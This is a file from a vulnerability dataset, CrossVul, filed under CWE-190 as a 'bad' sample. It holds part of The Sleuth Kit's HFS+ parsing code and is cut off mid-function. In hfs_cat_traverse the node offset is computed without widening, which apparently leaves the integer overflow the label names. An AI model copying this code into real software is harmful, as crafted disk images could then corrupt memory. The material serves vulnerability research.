| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_5375_1 |
crossvul-cpp_data_bad_711_0 | /*
** The Sleuth Kit
**
** This software is subject to the IBM Public License ver. 1.0,
** which was displayed prior to download and is included in the readme.txt
** file accompanying the Sleuth Kit files. It may also be requested from:
** Crucial Security Inc.
** 14900 Conference Center Drive
** Chantilly, VA 20151
**
** Copyright (c) 2009 Brian Carrier. All rights reserved.
**
** Judson Powers [jpowers@atc-nycorp.com]
** Matt Stillerman [matt@atc-nycorp.com]
** Rob Joyce [rob@atc-nycorp.com]
** Copyright (c) 2008, 2012 ATC-NY. All rights reserved.
** This file contains data developed with support from the National
** Institute of Justice, Office of Justice Programs, U.S. Department of Justice.
**
** Wyatt Banks [wbanks@crucialsecurity.com]
** Copyright (c) 2005 Crucial Security Inc. All rights reserved.
**
** Brian Carrier [carrier@sleuthkit.org]
** Copyright (c) 2003-2005 Brian Carrier. All rights reserved
**
** Copyright (c) 1997,1998,1999, International Business Machines
** Corporation and others. All Rights Reserved.
*/
/* TCT
* LICENSE
* This software is distributed under the IBM Public License.
* AUTHOR(S)
* Wietse Venema
* IBM T.J. Watson Research
* P.O. Box 704
* Yorktown Heights, NY 10598, USA
--*/
/*
** You may distribute the Sleuth Kit, or other software that incorporates
** part of all of the Sleuth Kit, in object code form under a license agreement,
** provided that:
** a) you comply with the terms and conditions of the IBM Public License
** ver 1.0; and
** b) the license agreement
** i) effectively disclaims on behalf of all Contributors all warranties
** and conditions, express and implied, including warranties or
** conditions of title and non-infringement, and implied warranties
** or conditions of merchantability and fitness for a particular
** purpose.
** ii) effectively excludes on behalf of all Contributors liability for
** damages, including direct, indirect, special, incidental and
** consequential damages such as lost profits.
** iii) states that any provisions which differ from IBM Public License
** ver. 1.0 are offered by that Contributor alone and not by any
** other party; and
** iv) states that the source code for the program is available from you,
** and informs licensees how to obtain it in a reasonable manner on or
** through a medium customarily used for software exchange.
**
** When the Sleuth Kit or other software that incorporates part or all of
** the Sleuth Kit is made available in source code form:
** a) it must be made available under IBM Public License ver. 1.0; and
** b) a copy of the IBM Public License ver. 1.0 must be included with
** each copy of the program.
*/
/** \file hfs.c
* Contains the general internal TSK HFS metadata and data unit code
*/
#include "tsk_fs_i.h"
#include "tsk_hfs.h"
#include <stdarg.h>
#ifdef TSK_WIN32
#include <string.h>
#else
#include <strings.h>
#endif
#define XSWAP(a,b) { a ^= b; b ^= a; a ^= b; }
// Compression Stuff
#ifdef HAVE_LIBZ
#include <zlib.h>
#endif
#include "lzvn.h"
// Forward declarations:
static uint8_t hfs_load_attrs(TSK_FS_FILE * fs_file);
static uint8_t hfs_load_extended_attrs(TSK_FS_FILE * file,
unsigned char *isCompressed, unsigned char *cmpType,
uint64_t * uncSize);
void error_detected(uint32_t errnum, char *errstr, ...);
void error_returned(char *errstr, ...);
#ifdef HAVE_LIBZ
/***************** ZLIB stuff *******************************/
// Adapted from zpipe.c (part of zlib) at http://zlib.net/zpipe.c
#define CHUNK 16384
/*
* Invokes the zlib library to inflate (uncompress) data.
*
* Returns and error code. Places the uncompressed data in a buffer supplied by the caller. Also
* returns the uncompressed length, and the number of compressed bytes consumed.
*
* Will stop short of the end of compressed data, if a natural end of a compression unit is reached. Using
* bytesConsumed, the caller can then advance the source pointer, and re-invoke the function. This will then
* inflate the next following compression unit in the data stream.
*
* @param source - buffer of compressed data
* @param sourceLen - length of the compressed data.
* @param dest -- buffer to hold the uncompressed results
* @param destLen -- length of the dest buffer
* @param uncompressedLength -- return of the length of the uncompressed data found.
* @param bytesConsumed -- return of the number of input bytes of compressed data used.
* @return 0 on success, a negative number on error
*/
static int
zlib_inflate(char *source, uint64_t sourceLen, char *dest, uint64_t destLen, uint64_t * uncompressedLength, unsigned long *bytesConsumed) // this is unsigned long because that's what zlib uses.
{
int ret;
unsigned have;
z_stream strm;
unsigned char in[CHUNK];
unsigned char out[CHUNK];
// Some vars to help with copying bytes into "in"
char *srcPtr = source;
char *destPtr = dest;
uint64_t srcAvail = sourceLen; //uint64_t
uint64_t amtToCopy;
uint64_t copiedSoFar = 0;
/* allocate inflate state */
strm.zalloc = Z_NULL;
strm.zfree = Z_NULL;
strm.opaque = Z_NULL;
strm.avail_in = 0;
strm.next_in = Z_NULL;
ret = inflateInit(&strm);
if (ret != Z_OK) {
error_detected(TSK_ERR_FS_READ,
"zlib_inflate: failed to initialize inflation engine (%d)",
ret);
return ret;
}
/* decompress until deflate stream ends or end of file */
do {
// Copy up to CHUNK bytes into "in" from source, advancing the pointer, and
// setting strm.avail_in equal to the number of bytes copied.
if (srcAvail >= CHUNK) {
amtToCopy = CHUNK;
srcAvail -= CHUNK;
}
else {
amtToCopy = srcAvail;
srcAvail = 0;
}
// wipe out any previous value, copy in the bytes, advance the pointer, record number of bytes.
memset(in, 0, CHUNK);
if (amtToCopy > SIZE_MAX || amtToCopy > UINT_MAX) {
error_detected(TSK_ERR_FS_READ,
"zlib_inflate: amtToCopy in one chunk is too large");
return -100;
}
memcpy(in, srcPtr, (size_t) amtToCopy); // cast OK because of above test
srcPtr += amtToCopy;
strm.avail_in = (uInt) amtToCopy; // cast OK because of above test
if (strm.avail_in == 0)
break;
strm.next_in = in;
/* run inflate() on input until output buffer not full */
do {
strm.avail_out = CHUNK;
strm.next_out = out;
ret = inflate(&strm, Z_NO_FLUSH);
if (ret == Z_NEED_DICT)
ret = Z_DATA_ERROR; // we don't have a custom dict
if (ret < 0 && ret != Z_BUF_ERROR) { // Z_BUF_ERROR is not fatal
error_detected(TSK_ERR_FS_READ,
" zlib_inflate: zlib returned error %d (%s)", ret,
strm.msg);
(void) inflateEnd(&strm);
return ret;
}
have = CHUNK - strm.avail_out;
// Is there enough space in dest to copy the current chunk?
if (copiedSoFar + have > destLen) {
// There is not enough space, so better return an error
error_detected(TSK_ERR_FS_READ,
" zlib_inflate: not enough space in inflation destination\n");
(void) inflateEnd(&strm);
return -200;
}
// Copy "have" bytes from out to destPtr, advance destPtr
memcpy(destPtr, out, have);
destPtr += have;
copiedSoFar += have;
} while ((strm.avail_out == 0) && (ret != Z_STREAM_END));
/* done when inflate() says it's done */
} while (ret != Z_STREAM_END);
if (ret == Z_STREAM_END)
*uncompressedLength = copiedSoFar;
*bytesConsumed = strm.total_in;
/* clean up and return */
(void) inflateEnd(&strm);
return ret == Z_STREAM_END ? Z_OK : Z_DATA_ERROR;
}
#endif
/* may set error up to string 1
* returns 0 on success, 1 on failure */
uint8_t
hfs_checked_read_random(TSK_FS_INFO * fs, char *buf, size_t len,
TSK_OFF_T offs)
{
ssize_t r;
r = tsk_fs_read(fs, offs, buf, len);
if (r != len) {
if (r >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
return 1;
}
return 0;
}
/**********************************************************************
*
* MISC FUNCS
*
**********************************************************************/
/* convert the HFS Time (seconds from 1/1/1904)
* to UNIX (UTC seconds from 1/1/1970)
* The number is borrowed from linux HFS driver source
*/
uint32_t
hfs_convert_2_unix_time(uint32_t hfsdate)
{
if (hfsdate < NSEC_BTWN_1904_1970)
return 0;
return (uint32_t) (hfsdate - NSEC_BTWN_1904_1970);
}
/**
* Convert a cnid (metadata address) to big endian array.
* This is used to create the key for tree lookups.
* @param cnid Metadata address to convert
* @param array [out] Array to write data into.
*/
static void
cnid_to_array(uint32_t cnid, uint8_t array[4])
{
array[3] = (cnid >> 0) & 0xff;
array[2] = (cnid >> 8) & 0xff;
array[1] = (cnid >> 16) & 0xff;
array[0] = (cnid >> 24) & 0xff;
}
/**********************************************************************
*
* Lookup Functions
*
**********************************************************************/
/* Compares the given HFS+ Extents B-tree key to key constructed
* for finding the beginning of the data fork extents for the given
* CNID. (That is, the search key uses the given CNID and has
* fork = 0 and start_block = 0.)
*/
static int
hfs_ext_compare_keys(HFS_INFO * hfs, uint32_t cnid,
const hfs_btree_key_ext * key)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) & (hfs->fs_info);
uint32_t key_cnid;
key_cnid = tsk_getu32(fs->endian, key->file_id);
if (key_cnid < cnid)
return -1;
if (key_cnid > cnid)
return 1;
/* referring to the same cnids */
/* we are always looking for the data fork */
if (key->fork_type != HFS_EXT_KEY_TYPE_DATA)
return 1;
/* we are always looking for a start_block of zero
(interested in the beginning of the extents, regardless
of what the start_block is); all files except the bad
blocks file should have a start_block greater than
zero */
if (tsk_getu32(fs->endian, key->start_block) == 0)
return 0;
return 1;
}
/** \internal
* Returns the length of an HFS+ B-tree INDEX key based on the tree header
* structure and the length claimed in the record. With some trees,
* the length given in the record is not used.
* Note that this neither detects nor correctly handles 8-bit keys
* (which should not be present in HFS+).
*
* This does not give the right answer for the Attributes File B-tree, for some
* HFS+ file systems produced by the Apple OS, while it works for others. For
* the Attributes file, INDEX keys should always be as stated in the record itself,
* never the "maxKeyLen" of the B-tree header.
*
* In this software, this function is only invoked when dealing with the Extents file. In
* that usage, it is not sufficiently well tested to know if it always gives the right
* answer or not. We can only test that with a highly fragmented disk.
* @param hfs File System
* @param keylen Length of key as given in record
* @param header Tree header
* @returns Length of key
*/
uint16_t
hfs_get_idxkeylen(HFS_INFO * hfs, uint16_t keylen,
const hfs_btree_header_record * header)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) & (hfs->fs_info);
// if the flag is set, use the length given in the record
if (tsk_getu32(fs->endian, header->attr) & HFS_BT_HEAD_ATTR_VARIDXKEYS)
return keylen;
else
return tsk_getu16(fs->endian, header->maxKeyLen);
}
/**
* Convert the extents runs to TSK_FS_ATTR_RUN runs.
*
* @param a_fs File system to analyze
* @param a_extents Raw extents to process (in an array of 8)
* @param a_start_off Starting block offset of these runs
* @returns NULL on error or if no runs are in extents (test tsk_errno)
*/
static TSK_FS_ATTR_RUN *
hfs_extents_to_attr(TSK_FS_INFO * a_fs, const hfs_ext_desc * a_extents,
TSK_OFF_T a_start_off)
{
TSK_FS_ATTR_RUN *head_run = NULL;
TSK_FS_ATTR_RUN *prev_run = NULL;
int i;
TSK_OFF_T cur_off = a_start_off;
// since tsk_errno is checked as a return value, make sure it is clean.
tsk_error_reset();
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_extents_to_attr: Converting extents from offset %" PRIuOFF
" to runlist\n", a_start_off);
for (i = 0; i < 8; ++i) {
TSK_FS_ATTR_RUN *cur_run;
uint32_t addr = tsk_getu32(a_fs->endian, a_extents[i].start_blk);
uint32_t len = tsk_getu32(a_fs->endian, a_extents[i].blk_cnt);
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_extents_to_attr: run %i at addr %" PRIu32
" with len %" PRIu32 "\n", i, addr, len);
if ((addr == 0) && (len == 0)) {
break;
}
// make a non-resident run
if ((cur_run = tsk_fs_attr_run_alloc()) == NULL) {
error_returned(" - hfs_extents_to_attr");
return NULL;
}
cur_run->addr = addr;
cur_run->len = len;
cur_run->offset = cur_off;
if (head_run == NULL)
head_run = cur_run;
if (prev_run != NULL)
prev_run->next = cur_run;
cur_off += cur_run->len;
prev_run = cur_run;
}
return head_run;
}
/**
* Look in the extents catalog for entries for a given file. Add the runs
* to the passed attribute structure.
*
* @param hfs File system being analyzed
* @param cnid file id of file to search for
* @param a_attr Attribute to add extents runs to
* @param dataForkQ if true, then find extents for the data fork. If false, then find extents for the Resource fork.
* @returns 1 on error and 0 on success
*/
static uint8_t
hfs_ext_find_extent_record_attr(HFS_INFO * hfs, uint32_t cnid,
TSK_FS_ATTR * a_attr, unsigned char dataForkQ)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) & (hfs->fs_info);
uint16_t nodesize; /* size of nodes (all, regardless of the name) */
uint32_t cur_node; /* node id of the current node */
char *node = NULL;
uint8_t is_done;
uint8_t desiredType;
tsk_error_reset();
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_ext_find_extent_record_attr: Looking for extents for file %"
PRIu32 " %s\n", cnid,
dataForkQ ? "data fork" : "resource fork");
if (!hfs->has_extents_file) {
// No extents file (which is optional), and so, no further extents are possible.
return 0;
}
// Are we looking for extents of the data fork or the resource fork?
desiredType =
dataForkQ ? HFS_EXT_KEY_TYPE_DATA : HFS_EXT_KEY_TYPE_RSRC;
// Load the extents attribute, if it has not been done so yet.
if (hfs->extents_file == NULL) {
ssize_t cnt;
if ((hfs->extents_file =
tsk_fs_file_open_meta(fs, NULL,
HFS_EXTENTS_FILE_ID)) == NULL) {
return 1;
}
/* cache the data attribute */
hfs->extents_attr =
tsk_fs_attrlist_get(hfs->extents_file->meta->attr,
TSK_FS_ATTR_TYPE_DEFAULT);
if (!hfs->extents_attr) {
tsk_error_errstr2_concat
(" - Default Attribute not found in Extents File");
return 1;
}
// cache the extents file header
cnt = tsk_fs_attr_read(hfs->extents_attr, 14,
(char *) &(hfs->extents_header),
sizeof(hfs_btree_header_record), 0);
if (cnt != sizeof(hfs_btree_header_record)) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
tsk_error_set_errstr2
("hfs_ext_find_extent_record_attr: Error reading header");
return 1;
}
}
// allocate a node buffer
nodesize = tsk_getu16(fs->endian, hfs->extents_header.nodesize);
if ((node = (char *) tsk_malloc(nodesize)) == NULL) {
return 1;
}
/* start at root node */
cur_node = tsk_getu32(fs->endian, hfs->extents_header.rootNode);
/* if the root node is zero, then the extents btree is empty */
/* if no files have overflow extents, the Extents B-tree still
exists on disk, but is an empty B-tree containing only
the header node */
if (cur_node == 0) {
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_ext_find_extent_record: "
"empty extents btree\n");
free(node);
return 0;
}
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_ext_find_extent_record: starting at "
"root node %" PRIu32 "; nodesize = %"
PRIu16 "\n", cur_node, nodesize);
/* Recurse down to the needed leaf nodes and then go forward */
is_done = 0;
while (is_done == 0) {
TSK_OFF_T cur_off; /* start address of cur_node */
uint16_t num_rec; /* number of records in this node */
ssize_t cnt;
hfs_btree_node *node_desc;
// sanity check
if (cur_node > tsk_getu32(fs->endian,
hfs->extents_header.totalNodes)) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_ext_find_extent_record_attr: Node %d too large for file",
cur_node);
free(node);
return 1;
}
// read the current node
cur_off = (TSK_OFF_T)cur_node * nodesize;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_ext_find_extent_record: reading node %" PRIu32
" at offset %" PRIuOFF "\n", cur_node, cur_off);
cnt = tsk_fs_attr_read(hfs->extents_attr, cur_off,
node, nodesize, 0);
if (cnt != nodesize) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
tsk_error_set_errstr2
("hfs_ext_find_extent_record_attr: Error reading node %d at offset %"
PRIuOFF, cur_node, cur_off);
free(node);
return 1;
}
// process the header / descriptor
if (nodesize < sizeof(hfs_btree_node)) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_ext_find_extent_record_attr: Node size %d is too small to be valid", nodesize);
free(node);
return 1;
}
node_desc = (hfs_btree_node *) node;
num_rec = tsk_getu16(fs->endian, node_desc->num_rec);
if (num_rec == 0) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_ext_find_extent_record: zero records in node %"
PRIu32, cur_node);
free(node);
return 1;
}
/* With an index node, find the record with the largest key that is smaller
* to or equal to cnid */
if (node_desc->type == HFS_BT_NODE_TYPE_IDX) {
uint32_t next_node = 0;
int rec;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_ext_find_extent_record: Index node %" PRIu32
" @ %" PRIu64 " has %" PRIu16 " records\n", cur_node,
cur_off, num_rec);
for (rec = 0; rec < num_rec; ++rec) {
int cmp;
size_t rec_off;
hfs_btree_key_ext *key;
// get the record offset in the node
rec_off =
tsk_getu16(fs->endian,
&node[nodesize - (rec + 1) * 2]);
if (rec_off + sizeof(hfs_btree_key_ext) > nodesize) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_ext_find_extent_record_attr: offset of record %d in index node %d too large (%d vs %"
PRIu16 ")", rec, cur_node, (int) rec_off,
nodesize);
free(node);
return 1;
}
key = (hfs_btree_key_ext *) & node[rec_off];
cmp = hfs_ext_compare_keys(hfs, cnid, key);
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_ext_find_extent_record: record %" PRIu16
" ; keylen %" PRIu16 " (FileId: %" PRIu32
", ForkType: %" PRIu8 ", StartBlk: %" PRIu32
"); compare: %d\n", rec, tsk_getu16(fs->endian,
key->key_len), tsk_getu32(fs->endian,
key->file_id), key->fork_type,
tsk_getu32(fs->endian, key->start_block), cmp);
/* save the info from this record unless it is bigger than cnid */
if ((cmp <= 0) || (next_node == 0)) {
hfs_btree_index_record *idx_rec;
int keylen =
2 + hfs_get_idxkeylen(hfs, tsk_getu16(fs->endian,
key->key_len), &(hfs->extents_header));
if (rec_off + keylen > nodesize) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_ext_find_extent_record_attr: offset and keylenth of record %d in index node %d too large (%d vs %"
PRIu16 ")", rec, cur_node,
(int) rec_off + keylen, nodesize);
free(node);
return 1;
}
idx_rec =
(hfs_btree_index_record *) & node[rec_off +
keylen];
next_node = tsk_getu32(fs->endian, idx_rec->childNode);
}
// we are bigger than cnid, so move on to the next node
if (cmp > 0) {
break;
}
}
// check if we found a relevant node, if not stop.
if (next_node == 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_ext_find_extent_record_attr: did not find any keys for %d in index node %d",
cnid, cur_node);
is_done = 1;
break;
}
cur_node = next_node;
}
/* with a leaf, we process until we are past cnid. We move right too if we can */
else if (node_desc->type == HFS_BT_NODE_TYPE_LEAF) {
int rec;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_ext_find_extent_record: Leaf node %" PRIu32 " @ %"
PRIu64 " has %" PRIu16 " records\n", cur_node, cur_off,
num_rec);
for (rec = 0; rec < num_rec; ++rec) {
size_t rec_off;
hfs_btree_key_ext *key;
uint32_t rec_cnid;
hfs_extents *extents;
TSK_OFF_T ext_off = 0;
int keylen;
TSK_FS_ATTR_RUN *attr_run;
// get the record offset in the node
rec_off =
tsk_getu16(fs->endian,
&node[nodesize - (rec + 1) * 2]);
if (rec_off > nodesize) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_ext_find_extent_record_attr: offset of record %d in leaf node %d too large (%d vs %"
PRIu16 ")", rec, cur_node, (int) rec_off,
nodesize);
free(node);
return 1;
}
key = (hfs_btree_key_ext *) & node[rec_off];
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_ext_find_extent_record: record %" PRIu16
"; keylen %" PRIu16 " (%" PRIu32
", %" PRIu8 ", %" PRIu32 ")\n", rec,
tsk_getu16(fs->endian, key->key_len),
tsk_getu32(fs->endian, key->file_id),
key->fork_type, tsk_getu32(fs->endian,
key->start_block));
rec_cnid = tsk_getu32(fs->endian, key->file_id);
// see if this record is for our file
// OLD logic, just handles the DATA fork
// if (rec_cnid < cnid) {
// continue;
// }
// else if ((rec_cnid > cnid)
// || (key->fork_type != HFS_EXT_KEY_TYPE_DATA)) {
// is_done = 1;
// break;
// }
// NEW logic, handles both DATA and RSRC forks.
if (rec_cnid < cnid) {
continue;
}
if (rec_cnid > cnid) {
is_done = 1;
break;
}
if (key->fork_type != desiredType) {
if (dataForkQ) {
is_done = 1;
break;
}
else
continue;
}
// OK, this is one of the extents records that we are seeking, so save it.
// Make sure there is room for the hfs_extents struct
keylen = 2 + tsk_getu16(fs->endian, key->key_len);
if (rec_off + keylen + sizeof(hfs_extents) > nodesize) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_ext_find_extent_record_attr: offset and keylenth of record %d in leaf node %d too large (%d vs %"
PRIu16 ")", rec, cur_node, (int) rec_off + keylen,
nodesize);
free(node);
return 1;
}
// get the starting offset of this extent
ext_off = tsk_getu32(fs->endian, key->start_block);
// convert the extents to the TSK format
extents = (hfs_extents *) & node[rec_off + keylen];
attr_run =
hfs_extents_to_attr(fs, extents->extents, ext_off);
if ((attr_run == NULL) && (tsk_error_get_errno() != 0)) {
tsk_error_errstr2_concat
(" - hfs_ext_find_extent_record_attr");
free(node);
return 1;
}
if (tsk_fs_attr_add_run(fs, a_attr, attr_run)) {
tsk_error_errstr2_concat
(" - hfs_ext_find_extent_record_attr");
free(node);
return 1;
}
}
cur_node = tsk_getu32(fs->endian, node_desc->flink);
if (cur_node == 0) {
is_done = 1;
break;
}
}
else {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr("hfs_ext_find_extent_record: btree node %"
PRIu32 " (%" PRIuOFF ") is neither index nor leaf (%" PRIu8
")", cur_node, cur_off, node_desc->type);
free(node);
return 1;
}
}
free(node);
return 0;
}
/** \internal
* Compares two Catalog B-tree keys.
* @param hfs File System being analyzed
* @param key1 Key 1 to compare
* @param key2 Key 2 to compare
* @returns -1 if key1 is smaller, 0 if equal, and 1 if key1 is larger
*/
int
hfs_cat_compare_keys(HFS_INFO * hfs, const hfs_btree_key_cat * key1,
const hfs_btree_key_cat * key2)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) & (hfs->fs_info);
uint32_t cnid1, cnid2;
cnid1 = tsk_getu32(fs->endian, key1->parent_cnid);
cnid2 = tsk_getu32(fs->endian, key2->parent_cnid);
if (cnid1 < cnid2)
return -1;
if (cnid1 > cnid2)
return 1;
return hfs_unicode_compare(hfs, &key1->name, &key2->name);
}
/** \internal
*
* Traverse the HFS catalog file. Call the callback for each
* record.
*
* @param hfs File system
* @param a_cb callback
* @param ptr Pointer to pass to callback
* @returns 1 on error
*/
uint8_t
hfs_cat_traverse(HFS_INFO * hfs,
TSK_HFS_BTREE_CB a_cb, void *ptr)
{
TSK_FS_INFO *fs = &(hfs->fs_info);
uint32_t cur_node; /* node id of the current node */
char *node;
uint16_t nodesize;
uint8_t is_done = 0;
tsk_error_reset();
nodesize = tsk_getu16(fs->endian, hfs->catalog_header.nodesize);
if ((node = (char *) tsk_malloc(nodesize)) == NULL)
return 1;
/* start at root node */
cur_node = tsk_getu32(fs->endian, hfs->catalog_header.rootNode);
/* if the root node is zero, then the extents btree is empty */
/* if no files have overflow extents, the Extents B-tree still
exists on disk, but is an empty B-tree containing only
the header node */
if (cur_node == 0) {
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_cat_traverse: "
"empty extents btree\n");
free(node);
return 1;
}
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_cat_traverse: starting at "
"root node %" PRIu32 "; nodesize = %"
PRIu16 "\n", cur_node, nodesize);
/* Recurse down to the needed leaf nodes and then go forward */
is_done = 0;
while (is_done == 0) {
TSK_OFF_T cur_off; /* start address of cur_node */
uint16_t num_rec; /* number of records in this node */
ssize_t cnt;
hfs_btree_node *node_desc;
// sanity check
if (cur_node > tsk_getu32(fs->endian,
hfs->catalog_header.totalNodes)) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_traverse: Node %d too large for file", cur_node);
free(node);
return 1;
}
// read the current node
cur_off = cur_node * nodesize;
cnt = tsk_fs_attr_read(hfs->catalog_attr, cur_off,
node, nodesize, 0);
if (cnt != nodesize) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
tsk_error_set_errstr2
("hfs_cat_traverse: Error reading node %d at offset %"
PRIuOFF, cur_node, cur_off);
free(node);
return 1;
}
// process the header / descriptor
if (nodesize < sizeof(hfs_btree_node)) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_traverse: Node size %d is too small to be valid", nodesize);
free(node);
return 1;
}
node_desc = (hfs_btree_node *) node;
num_rec = tsk_getu16(fs->endian, node_desc->num_rec);
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_cat_traverse: node %" PRIu32
" @ %" PRIu64 " has %" PRIu16 " records\n",
cur_node, cur_off, num_rec);
if (num_rec == 0) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr("hfs_cat_traverse: zero records in node %"
PRIu32, cur_node);
free(node);
return 1;
}
/* With an index node, find the record with the largest key that is smaller
* to or equal to cnid */
if (node_desc->type == HFS_BT_NODE_TYPE_IDX) {
uint32_t next_node = 0;
int rec;
for (rec = 0; rec < num_rec; ++rec) {
size_t rec_off;
hfs_btree_key_cat *key;
uint8_t retval;
uint16_t keylen;
// get the record offset in the node
rec_off =
tsk_getu16(fs->endian,
&node[nodesize - (rec + 1) * 2]);
if (rec_off > nodesize) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_traverse: offset of record %d in index node %d too large (%d vs %"
PRIu16 ")", rec, cur_node, (int) rec_off,
nodesize);
free(node);
return 1;
}
key = (hfs_btree_key_cat *) & node[rec_off];
keylen = 2 + tsk_getu16(hfs->fs_info.endian, key->key_len);
if ((keylen) > nodesize) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_traverse: length of key %d in index node %d too large (%d vs %"
PRIu16 ")", rec, cur_node, keylen, nodesize);
free(node);
return 1;
}
/*
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_traverse: record %" PRIu16
" ; keylen %" PRIu16 " (%" PRIu32 ")\n", rec,
tsk_getu16(fs->endian, key->key_len),
tsk_getu32(fs->endian, key->parent_cnid));
*/
/* save the info from this record unless it is too big */
retval =
a_cb(hfs, HFS_BT_NODE_TYPE_IDX, key,
cur_off + rec_off, ptr);
if (retval == HFS_BTREE_CB_ERR) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr2
("hfs_cat_traverse: Callback returned error");
free(node);
return 1;
}
// record the closest entry
else if ((retval == HFS_BTREE_CB_IDX_LT)
|| (next_node == 0)) {
hfs_btree_index_record *idx_rec;
int keylen =
2 + hfs_get_idxkeylen(hfs, tsk_getu16(fs->endian,
key->key_len), &(hfs->catalog_header));
if (rec_off + keylen > nodesize) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_traverse: offset of record and keylength %d in index node %d too large (%d vs %"
PRIu16 ")", rec, cur_node,
(int) rec_off + keylen, nodesize);
free(node);
return 1;
}
idx_rec =
(hfs_btree_index_record *) & node[rec_off +
keylen];
next_node = tsk_getu32(fs->endian, idx_rec->childNode);
}
if (retval == HFS_BTREE_CB_IDX_EQGT) {
// move down to the next node
break;
}
}
// check if we found a relevant node
if (next_node == 0) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_traverse: did not find any keys in index node %d",
cur_node);
is_done = 1;
break;
}
// TODO: Handle multinode loops
if (next_node == cur_node) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_traverse: node %d references itself as next node",
cur_node);
is_done = 1;
break;
}
cur_node = next_node;
}
/* With a leaf, we look for the specific record. */
else if (node_desc->type == HFS_BT_NODE_TYPE_LEAF) {
int rec;
for (rec = 0; rec < num_rec; ++rec) {
size_t rec_off;
hfs_btree_key_cat *key;
uint8_t retval;
uint16_t keylen;
// get the record offset in the node
rec_off =
tsk_getu16(fs->endian,
&node[nodesize - (rec + 1) * 2]);
if (rec_off > nodesize) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_traverse: offset of record %d in leaf node %d too large (%d vs %"
PRIu16 ")", rec, cur_node, (int) rec_off,
nodesize);
free(node);
return 1;
}
key = (hfs_btree_key_cat *) & node[rec_off];
keylen = 2 + tsk_getu16(hfs->fs_info.endian, key->key_len);
if ((keylen) > nodesize) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_traverse: length of key %d in leaf node %d too large (%d vs %"
PRIu16 ")", rec, cur_node, keylen, nodesize);
free(node);
return 1;
}
/*
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_traverse: record %" PRIu16
"; keylen %" PRIu16 " (%" PRIu32 ")\n", rec,
tsk_getu16(fs->endian, key->key_len),
tsk_getu32(fs->endian, key->parent_cnid));
*/
// rec_cnid = tsk_getu32(fs->endian, key->file_id);
retval =
a_cb(hfs, HFS_BT_NODE_TYPE_LEAF, key,
cur_off + rec_off, ptr);
if (retval == HFS_BTREE_CB_LEAF_STOP) {
is_done = 1;
break;
}
else if (retval == HFS_BTREE_CB_ERR) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr2
("hfs_cat_traverse: Callback returned error");
free(node);
return 1;
}
}
// move right to the next node if we got this far
if (is_done == 0) {
cur_node = tsk_getu32(fs->endian, node_desc->flink);
if (cur_node == 0) {
is_done = 1;
}
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_traverse: moving forward to next leaf");
}
}
else {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr("hfs_cat_traverse: btree node %" PRIu32
" (%" PRIu64 ") is neither index nor leaf (%" PRIu8 ")",
cur_node, cur_off, node_desc->type);
free(node);
return 1;
}
}
free(node);
return 0;
}
typedef struct {
const hfs_btree_key_cat *targ_key;
TSK_OFF_T off;
} HFS_CAT_GET_RECORD_OFFSET_DATA;
static uint8_t
hfs_cat_get_record_offset_cb(HFS_INFO * hfs, int8_t level_type,
const hfs_btree_key_cat * cur_key,
TSK_OFF_T key_off, void *ptr)
{
